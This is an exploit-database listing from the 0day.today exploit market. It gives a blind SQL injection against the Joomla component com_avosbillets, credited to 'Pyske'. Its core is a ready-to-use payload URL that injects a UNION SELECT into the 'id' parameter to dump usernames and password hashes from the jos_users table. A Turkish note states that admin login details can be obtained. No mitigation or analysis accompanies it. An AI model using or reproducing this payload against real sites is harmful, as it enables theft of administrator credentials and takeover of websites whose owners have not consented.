[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Joomla Component com_avosbillets Blind SQL Injection Vulnerability

Author
Pyske
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10554
Category
web applications
Date add
01-01-2010
Platform
unsorted
==================================================================
Joomla Component com_avosbillets Blind SQL Injection Vulnerability
==================================================================

<------------------- header data start ------------------- >
#############################################################
#        Joomla Component com_avosbillets Blind SQL Injection Vulnerability
#############################################################
# Author          : Pyske
# Name            : com_avosbillets
# Bug Type        : Blind SQL Injection
# Infection       : Admin login bilgileri alinabilir.
 
#############################################################
< ------------------- header data end of ------------------- >
< -- bug code start -- >
http://server/index.php?option=com_avosbillets&task=view&view=event&id=374/**/and/**/1=0/**/union/**/select/**/0,1,2,3,4,5,6,7,8,concat(username,0x3a,password),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/**/from/**/jos_users--
 
< -- bug code end of -- >



#  0day.today [2024-12-26]  #